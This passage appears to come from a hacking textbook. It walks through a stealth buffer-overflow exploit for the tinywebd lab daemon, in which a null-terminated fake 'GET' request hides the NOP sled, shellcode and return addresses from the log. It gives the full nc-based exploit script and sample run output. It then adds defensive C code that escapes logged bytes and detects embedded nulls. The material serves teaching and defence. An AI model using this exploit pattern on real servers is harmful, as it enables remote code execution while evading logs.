There's a simple mistake in the tinyweb daemon's source code that allows
the request buffer to be truncated early when it's used for the log file output,
but not when copying into memory. The recv_line() function uses \r\n as the
delimiter; however, all the other standard string functions use a null byte for
the delimiter. These string functions are used to write to the log file, so by
strategically using both delimiters, the data written to the log can be partially
controlled.
The following exploit script puts a valid-looking request in front of the rest
of the exploit buffer. The NOP sled is shrunk to accommodate the new data.
xtool_tinywebd_stealth.sh
#!/bin/sh
# stealth exploitation tool
if [ -z "$2" ]; then # If argument 2 is blank
    echo "Usage: $0 <shellcode file> <target IP>"
    exit
fi
# Camouflage request: a valid-looking line ended by a null byte, which the
# daemon's string functions treat as the end of the string
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
# The NOP sled shrinks by the size of the fake request so the total
# buffer length stays aligned with the return address slots
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE))
echo "[Fake Request ($FR_SIZE b)] [NOP ($ALIGNED_SLED_SIZE b)] [shellcode ($SIZE b)] [ret addr ($((4*32)) b)]"
(perl -e "print \"$FAKEREQUEST\" . \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32 . \"\r\n\"") | nc -w 1 -v $2 80
This new exploit buffer uses the null byte delimiter to terminate the fake
request camouflage. A null byte won't stop the recv_line() function, so the
rest of the exploit buffer is copied to the stack. Since the string functions
used to write to the log use a null byte for termination, the fake request is
logged and the rest of the exploit is hidden. The following output shows this
exploit script in use.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 7714
reader@hacking:~/booksrc $ jobs
[1]+ Running nc -l -p 31337 &
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (318 b)] [shellcode (83 b)] [ret addr (128 b)]
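The delimiter mismatch described above (recv_line() stops at \r\n, the logging code stops at the first null byte) is the whole reason the fake request is what ends up in the log. The following added example is not from the book or from tinywebd; it simulates the two readings of the same request line side by side and shows the logging behaviour a defender would want instead. recv_line_sim() is a simplified stand-in for the daemon's recv_line() (an assumption: it copies bytes until \r\n and returns the full count, ignoring null bytes), naive_log_len() is what any strlen()-based log write sees, escape_for_log() records the whole received line with non-printable bytes escaped, and has_embedded_nul() is a simple detection rule for a request line that is malformed in exactly this way. The sample stream is constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Simplified stand-in for the daemon's recv_line(): copy bytes from the
 * stream until the "\r\n" delimiter, paying no attention to null bytes.
 * Returns the number of bytes before the delimiter (assumption: the real
 * function's details differ, but its delimiter choice is the same). */
size_t recv_line_sim(const unsigned char *stream, size_t stream_len,
                     unsigned char *dest, size_t dest_len)
{
    size_t n = 0;
    while (n < stream_len && n < dest_len) {
        dest[n] = stream[n];
        n++;
        if (n >= 2 && dest[n - 2] == '\r' && dest[n - 1] == '\n')
            return n - 2;           /* delimiter found; exclude it */
    }
    return n;
}

/* What a strlen()-based write to the log file sees: everything up to the
 * first null byte, which is the camouflage request and nothing else. */
size_t naive_log_len(const unsigned char *line)
{
    return strlen((const char *)line);
}

/* Hardened logging: use the received byte count, not strlen(), and escape
 * every non-printable byte as \xHH so the log holds the full line.
 * Returns the escaped length; out is always NUL-terminated. */
size_t escape_for_log(const unsigned char *line, size_t line_len,
                      char *out, size_t out_len)
{
    size_t o = 0;
    for (size_t i = 0; i < line_len; i++) {
        unsigned char c = line[i];
        if (isprint(c) && c != '\\') {
            if (o + 1 >= out_len) break;
            out[o++] = (char)c;
        } else {
            if (o + 4 >= out_len) break;
            o += (size_t)snprintf(out + o, out_len - o, "\\x%02x", c);
        }
    }
    out[o] = '\0';
    return o;
}

/* Detection rule: a null byte before the \r\n delimiter is never valid in
 * an HTTP request line and is worth alerting on. */
int has_embedded_nul(const unsigned char *line, size_t line_len)
{
    return memchr(line, '\0', line_len) != NULL;
}

struct log_view {
    size_t received;      /* bytes recv_line_sim() copied */
    size_t logged;        /* bytes a strlen()-based log write records */
    size_t escaped;       /* bytes the hardened logger records */
    int    embedded_nul;  /* detection rule result */
};

/* Run both readings over one stream so they can be compared directly. */
struct log_view analyze(const unsigned char *stream, size_t stream_len)
{
    unsigned char line[512];
    char escaped[2048];
    struct log_view v;
    v.received = recv_line_sim(stream, stream_len, line, sizeof line - 1);
    line[v.received] = '\0';   /* mirror the real function's NUL termination */
    v.logged = naive_log_len(line);
    v.escaped = escape_for_log(line, v.received, escaped, sizeof escaped);
    v.embedded_nul = has_embedded_nul(line, v.received);
    return v;
}

/* Constructed sample: camouflage request, a null byte, a few bytes standing
 * in for the hidden remainder, then the \r\n delimiter. */
const unsigned char SAMPLE_STREAM[] = {
    'G', 'E', 'T', ' ', '/', ' ', 'H', 'T', 'T', 'P', '/', '1', '.', '1',
    0x00, 0x90, 0x90, 0x90, 'A', 'B', 'C', '\r', '\n'
};
const size_t SAMPLE_STREAM_LEN = sizeof SAMPLE_STREAM;

int main(void)
{
    unsigned char line[512];
    char escaped[2048];
    struct log_view v = analyze(SAMPLE_STREAM, SAMPLE_STREAM_LEN);
    size_t n = recv_line_sim(SAMPLE_STREAM, SAMPLE_STREAM_LEN, line, sizeof line - 1);
    escape_for_log(line, n, escaped, sizeof escaped);
    printf("received %zu bytes, strlen() logging sees %zu, escaped log sees %zu\n",
           v.received, v.logged, v.escaped);
    printf("embedded NUL: %s\n", v.embedded_nul ? "yes" : "no");
    printf("escaped log line: %s\n", escaped);
    return 0;
}
```

On the sample stream the naive reading logs only the 14-byte "GET / HTTP/1.1", while the received line is 21 bytes; a logger that writes the received count and escapes the bytes records all of it, and the embedded null byte alone is enough to flag the request.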